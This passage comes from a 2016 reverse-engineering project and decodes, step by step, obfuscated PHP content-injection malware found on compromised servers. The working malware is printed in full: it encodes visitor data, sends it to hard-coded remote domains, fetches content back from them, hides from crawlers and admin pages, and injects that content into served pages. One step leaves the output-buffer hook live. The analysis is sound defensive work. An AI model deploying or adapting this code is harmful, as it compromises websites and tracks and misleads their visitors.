22 | $s1v="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; /** REVENGNOTE: create_function **/
23 | 
24 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
25 | $svv = '//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46\27x\36\56x\26\77x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x\441\d6x\"=m$;"261\47x\361\26x\561\37x\"=r$;"351\36x\141\07x\"=p$;"651\56x\451\27x\461\37x\"=l$9{9)q$9,s$(2ne9noitcnuf;}';
26 | 
27 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
28 | $n9 = '1067|416|779|223|361';
29 | 
30 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
31 | $v9 = '5656}5;Bv5;oc$v5Y5;-4_g@&oc$5;oc$v5Y5;-3_g@&oc$5;oc$v5Y5;-2_g@&oc$5;oc$v5Y5;-1_g@&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW@5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW@5{6))086,1pi$6,J(tcennocW@!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW@&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi@(pi2gnol@&2pi$5;)X$(emanybXteg@&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap@6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi@&%5;-elif@&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z@&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg@ nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe@=1a$ ;)po$,)-$(dtg@(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45@9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *@ = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W@Y@RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|@:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W';
32 | 
33 | function oo2($b)
34 | {
35 |     $h = explode("|", strrev($b));
36 |     $d = explode("*", $h[0]);
37 |     $b = $h[1];
38 |     for ($i = 0; $i < sizeof($d); $i++) {
39 |         $b = str_replace($i, $d[$i], $b);
40 |     }
41 | 
42 | 	/** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
43 | 	echo PHP_EOL. '>> function oo2($b): resultado   ' . print_r("};" . $b . "//", true) . PHP_EOL;
44 | 
45 |     /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
46 |     //create_function("", "};" . $b . "//");
47 | }
48 | 
49 | function cqq($qw)
50 | {
51 |     $domarr = array(
52 |         "33db9538",
53 |         "9507c4e8",
54 |         "e5b57288",
55 |         "54dfa1cb"
56 |     );
57 |     return random($domarr, $qw);
58 | }
59 | 
60 | function oo1($y)
61 | {
62 |     $y = strrev($y);
63 |     $g = substr($y, strpos($y, "9") + 1);
64 |     $v = explode(":", substr($y, 0, strpos($y, "9")));
65 |     for ($i = 0; $i < sizeof($v); $i++) {
66 |         $q = explode("|", $v[$i]);
67 |         $g = str_replace($q[0], $q[1], $g);
68 |     }
69 | 
70 |     /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
71 | 	echo PHP_EOL . '>> function oo1($b): resultado   ' . print_r("};" . $g . "//", true) . PHP_EOL;
72 | 
73 |     /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
74 |     //create_function("", "};" . $g . "//");
75 | }
76 | 
77 | 
78 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
79 | echo '$s1v:' . print_r($s1v, true) . PHP_EOL; // create_function
80 | echo '$siv:' . print_r($siv, true) . PHP_EOL; // str_replace
81 | echo '$slv:' . print_r($slv, true) . PHP_EOL; // strrev
82 | 
83 | 
84 | /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
85 | //$s1v("", $siv("\71", " ", $slv($svv))); /** REVENGNOTE:create_function("", str_replace("\71", " ", strrev($svv))); */
86 | 
87 | /** REVENGNOTE: next code was not on this step, but was added to make it run or debug **/
88 | echo '$siv("\71", " ", $slv($svv)):' . print_r($siv("\71", " ", $slv($svv)), true) . PHP_EOL;
89 | 
90 | 
91 | /** REVENGNOTE: nnext step file have contents of the last eval call on this file **/


--------------------------------------------------------------------------------
/step-by-step/reveng-step-6.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | /**
 4 |  * This is a This is a reverse-engineering of malicious code found in
 5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
 6 |  * in the original code.
 7 |  *
 8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
 9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
12 |  * @license    See LICENSE
13 |  */
14 | 
15 | 
16 | function en2($s, $q)
17 | {
18 | 	$l = "\x73\164\x72\154\x65\156";
19 | 	$p = "\x70\141\x63\153";
20 | 	$r = "\x73\165\x62\163\x74\162";
21 | 	$m = "\x6d\144\x35";
22 | 	$g = "";
23 | 	while ($l($g) < $l($s)) {
24 | 		$q = $p("H*", $m($g . $q . "\x71\61\x77\62\x65\63\x72\64"));
25 | 		$g.= $r($q, 0, 8);
26 | 	}
27 | 
28 | 	return $s ^ $g;
29 | }
30 | 
31 | 
32 | function random($arr, $qw)
33 | {
34 |     $g = "\x20\167\x2d\70\x36794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\x33\54\x67\75\x20\167\x2e\40\x72\73\x20\155\x2d\70" . "6d944835,sq-873964872937873960\x38\66\x63\71\x35\61\x38\67\x34\42\x3b";
35 |     $soy = "\x65\156\x32";
36 |     $xx = "\x65\170\x70" . "\154\x6f\144\x65";
37 |     $ecx = "\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e";
38 |     $scy = "\x73\164\x72\137\x72\145\x70\154\x61\143\x65";
39 |     $a = $xx("|", "\x5c\170\x7c\134\x31\174\x3d\42\x7c\42\x3b\44\x7c\44");
40 |     $aa = $xx("|", "8|9|-|,| ");
41 |     $mec = $ecx;
42 |     for ($i = 0; $i < sizeof($a); $i++) {
43 |         $g = $scy($aa[$i], $a[$i], $g);
44 |     }
45 | 
46 |     $ecx("", "};$g//");
47 |     $mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20", $scy));
48 |     return $arr[rand((0.24 - (0.03 * 8)) , (0.1875 * 6)) ] . $qw;
49 | }
50 | 
51 | $r9 = explode("|", $n9);
52 | $b9 = 0;
53 | $a9 = 0;
54 | 
55 | for ($i9 = 0; $i9 < sizeof($r9); $i9++) {
56 |     if ($i9 == 0) $a9 = 0;
57 |     else $a9 = $r9[$i9 - 1] + $a9;
58 |     $b9 = $r9[$i9];
59 |     $v_[] = substr($v9, $a9, $b9);
60 | }
61 | 
62 | $y = 1;
63 | 
64 | for ($i = 0; $i < 5; $i++) {
65 |     /** REVENGNOTE: after all this effort to hide the code, this is is a different
66 |      *              pattern of just call eval or create function. This for
67 |      *              loop ask contents of one array with 5 elements, and, in a
68 |      *              bizarre way change witch function will run the array contents
69 |      **/
70 | 
71 |     $vv1 = "o" . "o" . $y; /** REVENGNOTE: function oo1() or oo2() **/
72 |     if ($y == 1) $y = 2;
73 |     else $y = 1;
74 |     $vv1($v_[$i]);
75 | }
76 | 
77 | /** REVENGNOTE: nnext step file have contents the array $v_ **/


--------------------------------------------------------------------------------
/step-by-step/reveng-step-7.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | /**
 4 |  * This is a This is a reverse-engineering of malicious code found in
 5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
 6 |  * in the original code.
 7 |  *
 8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
 9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
12 |  * @license    See LICENSE
13 |  */
14 | 
15 | 
16 | // ARRAY 0, START
17 | function g_1($url) { if (function_exists("file_get_contents") === false) return false; $buf = @file_get_contents($url); if ($buf == "") return false; return $buf; }   function g_2($url) { if (function_exists("curl_init") === false) return false; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_HEADER, 0); $res = curl_exec($ch); curl_close($ch); if ($res == "") return false; return $res; } function g_3($url) { if (function_exists("file") === false) return false; $inc = @file($url); $buf = @implode("", $inc); if ($buf == "") return false; return $buf; }  function g_4($url) { if (function_exists("socket_create") === false) return false; $p= @parse_url($url); $host = $p["host"]; if(!isset($p["query"])) $p["query"]=""; $uri = $p["path"] . "?" . $p["query"]; $ip1 = @gethostbyname($host); $ip2 = @long2ip(@ip2long($ip1)); if ($ip1 != $ip2) return false; $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!@socket_connect($sock, $ip1, 80)) { @socket_close($sock); return false; } $req = "GET $uri HTTP/1.0\n"; $req .= "Host: $host\n\n"; socket_write($sock, $req); $buf = ""; while ($t = socket_read($sock, 10000)) { $buf .= $t; } @socket_close($sock); if ($buf == "") return false; list($m, $buf) = explode("\r\n\r\n", $buf); return $buf;  }  function gtd ($url) { $co = ""; $co = @g_1($url); if ($co !== false) return $co; $co = @g_2($url); if ($co !== false) return $co; $co = @g_3($url); if ($co !== false) return $co; $co = @g_4($url); if ($co !== false) return $co; return ""; }
18 | // ARRAY 0, END
19 | 
20 | // ARRAY 1, START
21 | if (!function_exists("comgzi")) { function comgzi($gzData) { if (substr($gzData,0,3)=="\x1f\x8b\x08") { $i=10; $flg=ord(substr($gzData,3,1)); if ($flg>0) { if ($flg & 4) { list($xlen)=unpack("v",substr($gzData,$i,2)); $i=$i+2+$xlen;} if ($flg & 8) $i=strpos($gzData,"\0",$i)+1; if ($flg & 16) $i=strpos($gzData,"\0", $i)+1; if ( $flg & 2) $i=$i+2;} return @gzinflate(substr($gzData,$i,-8));} else{ return false;}}}
22 | // ARRAY 1, END
23 | 
24 | // ARRAY 2, START
25 | function k34($op,$text) { return base64_encode(en2($text, $op)); } function check212($param) { if(!isset($_SERVER[$param])) $a="non"; else if ($_SERVER[$param]=="") $a="non"; else $a=$_SERVER[$param]; return $a; } function day212() { $a=check212("HTTP_USER_AGENT"); $b=check212("HTTP_REFERER"); $c=check212("REMOTE_ADDR"); $d=check212("HTTP_HOST"); $e=check212("PHP_SELF"); $domarr = array("33db9538","9507c4e8","e5b57288","54dfa1cb"); if (($a=="non") or ($c=="non") or ($d=="non") or strrpos(strtolower($e),"admin") or (preg_match("/" . implode("|", array("google","slurp","msnbot","ia_archiver","yandex","rambler")) . "/i", strtolower($a))) ) { $o1 = ""; } else { $op=mt_rand(100000,999999); $g4=$op."?".urlencode(urlencode(k34($op,$a).".".k34($op,$b).".".k34($op,$c).".".k34($op,$d).".".k34($op,$e))); $url="http://".cqq(".com")."/".$g4; $ca1=en2(@gtd($url),$op); $a1=@explode("!NF0",$ca1); if (sizeof($a1)>=2) $o1 = $a1[1]; else $o1 = ""; } return $o1; }
26 | // ARRAY 2, END
27 | 
28 | // ARRAY 3, START
29 | if (!function_exists("dcoo")) { function dcoo($cz, $length = null) { if (false !== ($dz = @gzinflate($cz) ) ) return $dz; if (false !== ($dz = @comgzi($cz) ) ) return $dz; if (false !== ($dz = @gzuncompress($cz) ) ) return $dz; if (function_exists("gzdecode") ) { $dz = @gzdecode($cz); if (false !==$dz ) return $dz; } return $cz; }}
30 | 
31 | // ARRAY 3, END
32 | 
33 | // ARRAY 4, START
34 | if(!function_exists("pa22")) { function pa22($v) { Header("Content-Encoding: none"); $p="\x70\162\x65\147\x5f";$p1=$p."\155\x61\164\x63\150";$p2=$p."\162\x65\160\x6c\141\x63\145"; $t=dcoo($v); if($p1("/\<\/body/si",$t)) { return $p2("/(\<\/body[^\>]*\>)/si", day212()."\n"."$"."1", $t,1); } else { if($p1("/\<\/html/si",$t)) { return $p2("/(\<\/html[^\>]*\>)/si", day212()."\n"."$"."1", $t,1); } else { return $t; } } } } ob_start("pa22");
35 | // ARRAY 4, END
36 | 
37 | 


--------------------------------------------------------------------------------
/step-by-step/reveng-step-8.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | /**
  4 |  * This is a This is a reverse-engineering of malicious code found in
  5 |  * compromised servers. "REVENGNOTE" is used for comments that are not
  6 |  * in the original code.
  7 |  *
  8 |  * @see        https://github.com/alligo/Reverse-Engineering-PHP-Malware-Content-injection
  9 |  * @author     Bernardo Donadio <emerson at alligo.com.br>
 10 |  * @author     Emerson Rocha Luiz <emerson at alligo.com.br>
 11 |  * @copyright  Copyright (C) 2016 Alligo Ltda. Some rights reserved.
 12 |  * @license    See LICENSE
 13 |  */
 14 | 
 15 | 
 16 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
 17 | function en2($s, $q)
 18 | {
 19 | 	$l = "\x73\164\x72\154\x65\156";
 20 | 	$p = "\x70\141\x63\153";
 21 | 	$r = "\x73\165\x62\163\x74\162";
 22 | 	$m = "\x6d\144\x35";
 23 | 	$g = "";
 24 | 	while ($l($g) < $l($s)) {
 25 | 		$q = $p("H*", $m($g . $q . "\x71\61\x77\62\x65\63\x72\64"));
 26 | 		$g.= $r($q, 0, 8);
 27 | 	}
 28 | 
 29 | 	return $s ^ $g;
 30 | }
 31 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
 32 | function cqq($qw)
 33 | {
 34 |     $domarr = array(
 35 |         "33db9538",
 36 |         "9507c4e8",
 37 |         "e5b57288",
 38 |         "54dfa1cb"
 39 |     );
 40 |     return random($domarr, $qw);
 41 | }
 42 | /** REVENGNOTE: next code was added to make this file work. Was present on last step **/
 43 | function random($arr, $qw)
 44 | {
 45 |     $g = "\x20\167\x2d\70\x36794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\x33\54\x67\75\x20\167\x2e\40\x72\73\x20\155\x2d\70" . "6d944835,sq-873964872937873960\x38\66\x63\71\x35\61\x38\67\x34\42\x3b";
 46 |     $soy = "\x65\156\x32";
 47 |     $xx = "\x65\170\x70" . "\154\x6f\144\x65";
 48 |     $ecx = "\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e";
 49 |     $scy = "\x73\164\x72\137\x72\145\x70\154\x61\143\x65";
 50 |     $a = $xx("|", "\x5c\170\x7c\134\x31\174\x3d\42\x7c\42\x3b\44\x7c\44");
 51 |     $aa = $xx("|", "8|9|-|,| ");
 52 |     $mec = $ecx;
 53 |     for ($i = 0; $i < sizeof($a); $i++) {
 54 |         $g = $scy($aa[$i], $a[$i], $g);
 55 |     }
 56 | 
 57 |     $ecx("", "};$g//");
 58 |     $mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20", $scy));
 59 |     return $arr[rand((0.24 - (0.03 * 8)) , (0.1875 * 6)) ] . $qw;
 60 | }
 61 | 
 62 | 
 63 | function g_1($url)
 64 | {
 65 | 	if (function_exists("file_get_contents") === false) return false;
 66 | 	$buf = @file_get_contents($url);
 67 | 	if ($buf == "") return false;
 68 | 	return $buf;
 69 | }
 70 | 
 71 | function g_2($url)
 72 | {
 73 | 	if (function_exists("curl_init") === false) return false;
 74 | 	$ch = curl_init();
 75 | 	curl_setopt($ch, CURLOPT_URL, $url);
 76 | 	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 77 | 	curl_setopt($ch, CURLOPT_TIMEOUT, 10);
 78 | 	curl_setopt($ch, CURLOPT_HEADER, 0);
 79 | 	$res = curl_exec($ch);
 80 | 	curl_close($ch);
 81 | 	if ($res == "") return false;
 82 | 	return $res;
 83 | }
 84 | 
 85 | function g_3($url)
 86 | {
 87 | 	if (function_exists("file") === false) return false;
 88 | 	$inc = @file($url);
 89 | 	$buf = @implode("", $inc);
 90 | 	if ($buf == "") return false;
 91 | 	return $buf;
 92 | }
 93 | 
 94 | function g_4($url)
 95 | {
 96 | 	if (function_exists("socket_create") === false) return false;
 97 | 	$p = @parse_url($url);
 98 | 	$host = $p["host"];
 99 | 	if (!isset($p["query"])) $p["query"] = "";
100 | 	$uri = $p["path"] . "?" . $p["query"];
101 | 	$ip1 = @gethostbyname($host);
102 | 	$ip2 = @long2ip(@ip2long($ip1));
103 | 	if ($ip1 != $ip2) return false;
104 | 	$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
105 | 	if (!@socket_connect($sock, $ip1, 80)) {
106 | 		@socket_close($sock);
107 | 		return false;
108 | 	}
109 | 
110 | 	$req = "GET $uri HTTP/1.0\n";
111 | 	$req.= "Host: $host\n\n";
112 | 	socket_write($sock, $req);
113 | 	$buf = "";
114 | 	while ($t = socket_read($sock, 10000)) {
115 | 		$buf.= $t;
116 | 	}
117 | 
118 | 	@socket_close($sock);
119 | 	if ($buf == "") return false;
120 | 	list($m, $buf) = explode("\r\n\r\n", $buf);
121 | 	return $buf;
122 | }
123 | 
124 | function gtd($url)
125 | {
126 | 	$co = "";
127 | 	$co = @g_1($url);
128 | 	if ($co !== false) return $co;
129 | 	$co = @g_2($url);
130 | 	if ($co !== false) return $co;
131 | 	$co = @g_3($url);
132 | 	if ($co !== false) return $co;
133 | 	$co = @g_4($url);
134 | 	if ($co !== false) return $co;
135 | 	return "";
136 | }
137 | 
138 | // ARRAY 0, END
139 | // ARRAY 1, START
140 | 
141 | if (!function_exists("comgzi")) {
142 | 	function comgzi($gzData)
143 | 	{
144 | 		if (substr($gzData, 0, 3) == "\x1f\x8b\x08") {
145 | 			$i = 10;
146 | 			$flg = ord(substr($gzData, 3, 1));
147 | 			if ($flg > 0) {
148 | 				if ($flg & 4) {
149 | 					list($xlen) = unpack("v", substr($gzData, $i, 2));
150 | 					$i = $i + 2 + $xlen;
151 | 				}
152 | 
153 | 				if ($flg & 8) $i = strpos($gzData, "\0", $i) + 1;
154 | 				if ($flg & 16) $i = strpos($gzData, "\0", $i) + 1;
155 | 				if ($flg & 2) $i = $i + 2;
156 | 			}
157 | 
158 | 			return @gzinflate(substr($gzData, $i, -8));
159 | 		}
160 | 		else {
161 | 			return false;
162 | 		}
163 | 	}
164 | }
165 | 
166 | // ARRAY 1, END
167 | // ARRAY 2, START
168 | 
169 | function k34($op, $text)
170 | {
171 | 	return base64_encode(en2($text, $op));
172 | }
173 | 
174 | function check212($param)
175 | {
176 | 	if (!isset($_SERVER[$param])) $a = "non";
177 | 	else
178 | 	if ($_SERVER[$param] == "") $a = "non";
179 | 	else $a = $_SERVER[$param];
180 | 	return $a;
181 | }
182 | 
183 | /** REVENGNOTE: Do not assume that this malware will have same function names.
184 |  *              even for the same malware.
185 |  */
186 | function day212()
187 | {
188 | 	$a = check212("HTTP_USER_AGENT");
189 | 	$b = check212("HTTP_REFERER");
190 | 	$c = check212("REMOTE_ADDR");
191 | 	$d = check212("HTTP_HOST");
192 | 	$e = check212("PHP_SELF");
193 | 
194 | 	/** REVENGNOTE: this next array does nothing here. But was on original code.
195 | 	 *              33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
196 | 	 *              are domains that point (now) for the same working server
197 | 	 *              they are used to create content to inject on user code
198 | 	 *
199 | 	 */
200 | 	$domarr = array(
201 | 		"33db9538",
202 | 		"9507c4e8",
203 | 		"e5b57288",
204 | 		"54dfa1cb"
205 | 	);
206 | 
207 | 	/** REVENGNOTE: this is very important. It does NOT inject content on site
208 | 	 *              if is a search engine (that could alert site admin of this
209 | 	 *              malware, and also does not load on pages that are like
210 | 	 *              for administratior interfaces. It also check for a valid
211 |      *              HTTP_REFERER, so sometimes, share a link with a friend will
212 |      *              not work at all, because you need navitate on the site before
213 |      *              Is very likely that most common antivirus agents will maybe
214 |      *              pass this basic check, but remote server will know they
215 |      *              user agent and will return empty content.
216 | 	 */
217 | 	if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
218 | 		"google",
219 | 		"slurp",
220 | 		"msnbot",
221 | 		"ia_archiver",
222 | 		"yandex",
223 | 		"rambler"
224 | 	)) . "/i", strtolower($a)))) {
225 | 		$o1 = "";
226 | 	}
227 | 	else {
228 | 		$op = mt_rand(100000, 999999);
229 | 		$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
230 | 		$url = "http://" . cqq(".com") . "/" . $g4;
231 | 		$ca1 = en2(@gtd($url) , $op);
232 | 		$a1 = @explode("!NF0", $ca1);
233 | 		if (sizeof($a1) >= 2) $o1 = $a1[1];
234 | 		else $o1 = "";
235 | 	}
236 | 
237 | 	return $o1;
238 | }
239 | 
240 | // ARRAY 2, END
241 | // ARRAY 3, START
242 | 
243 | if (!function_exists("dcoo")) {
244 | 	function dcoo($cz, $length = null)
245 | 	{
246 | 		if (false !== ($dz = @gzinflate($cz))) return $dz;
247 | 		if (false !== ($dz = @comgzi($cz))) return $dz;
248 | 		if (false !== ($dz = @gzuncompress($cz))) return $dz;
249 | 		if (function_exists("gzdecode")) {
250 | 			$dz = @gzdecode($cz);
251 | 			if (false !== $dz) return $dz;
252 | 		}
253 | 
254 | 		return $cz;
255 | 	}
256 | }
257 | 
258 | // ARRAY 3, END
259 | // ARRAY 4, START
260 | 
261 | if (!function_exists("pa22")) {
262 | 	function pa22($v)
263 | 	{
264 | 		Header("Content-Encoding: none");
265 | 		$p = "\x70\162\x65\147\x5f";
266 | 		$p1 = $p . "\155\x61\164\x63\150";
267 | 		$p2 = $p . "\162\x65\160\x6c\141\x63\145";
268 | 		$t = dcoo($v);
269 | 		if ($p1("/\<\/body/si", $t)) {
270 | 			return $p2("/(\<\/body[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
271 | 		}
272 | 		else {
273 | 			if ($p1("/\<\/html/si", $t)) {
274 | 				return $p2("/(\<\/html[^\>]*\>)/si", day212() . "\n" . "$" . "1", $t, 1);
275 | 			}
276 | 			else {
277 | 				return $t;
278 | 			}
279 | 		}
280 | 	}
281 | }
282 | 
283 | /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
284 | //ob_start("pa22");
285 | 
286 | /** REVENGNOTE: next code was not on this step, is a modified version of original day212()
287 |  *              function. If you wanna debut this malware, here is your start point
288 |  **/
289 | function day212_fiti()
290 | {
291 | 
292 | 	// $a = check212("HTTP_USER_AGENT");
293 | 	$a = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko';
294 | 	// $b = check212("HTTP_REFERER");
295 | 	$b = 'http://www.electrictoolbox.com/';
296 | 	// $c = check212("REMOTE_ADDR");
297 | 	$c = '198.133.12.17';
298 | 	// $d = check212("HTTP_HOST");
299 | 	$d = 'xpto.com.br';
300 | 	// $e = check212("PHP_SELF");
301 | 
302 | 	$e = '/index.php';
303 | 	/** REVENGNOTE: this next array does nothing here. But was on original code.
304 | 	 *              33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
305 | 	 *              are domains that point (now) for the same working server
306 | 	 *              they are used to create content to inject on user code
307 | 	 *
308 | 	 */
309 | 	$domarr = array(
310 | 		"33db9538",
311 | 		"9507c4e8",
312 | 		"e5b57288",
313 | 		"54dfa1cb"
314 | 	);
315 | 
316 |     /** REVENGNOTE: check original day212() function. This remove logic of
317 |      *              check if should or not request remote server for contents
318 |      *              just for debug
319 |     **/
320 | 
321 | 	$op = mt_rand(100000, 999999);
322 | 	$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
323 | 	$url = "http://" . cqq(".com") . "/" . $g4;
324 | 	echo PHP_EOL . '$url: ' . $url . ' ';
325 | 	$ca1 = en2(@gtd($url) , $op);
326 | 	$a1 = @explode("!NF0", $ca1);
327 | 	if (sizeof($a1) >= 2) $o1 = $a1[1];
328 | 	else $o1 = "";
329 | 	return $o1;
330 | }
331 | 
332 | /** REVENGNOTE: next lines was commented to disable run the source. Original have it enabled **/
333 | var_dump(day212_fiti());
334 | echo PHP_EOL;
335 | 


--------------------------------------------------------------------------------